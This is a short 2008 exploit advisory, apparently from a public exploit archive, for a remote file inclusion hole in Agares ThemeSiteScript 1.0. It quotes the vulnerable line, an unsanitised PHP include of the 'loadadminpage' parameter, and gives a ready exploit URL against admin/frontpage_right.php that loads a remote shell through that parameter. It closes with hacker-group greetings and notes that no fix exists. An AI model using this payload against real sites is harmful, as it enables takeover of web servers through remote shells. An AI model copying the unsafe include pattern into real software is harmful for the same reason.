Agares ThemeSiteScript 1.0 (loadadminpage) RFI Vulnerability

2008-10-28 21:01:07

**************************************************************************************

Author : DaRkLiFe
Greetz : str0ke & S.W.A.T. & funkys0ul & Team 1nF3Ct3d

**************************************************************************************
Script :

ThemeSiteScript v1.0 Remote File Inclusion Vulnerability

Home Page :

http://agaresmedia.com

Download :

http://rapidshare.com/files/72501220/ThemeSiteScript_1.0_webgraf.ru.rar

**************************************************************************************

Exploit :

http://localhost/upload/admin/frontpage_right.php?loadadminpage=Sh3lLz?

**************************************************************************************

Vulnerable : line 2 : <?PHP include($loadadminpage); ?>

**************************************************************************************

THANKS ! GREETZ ! HAPPY DIWALI !
**************************************************************************************

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.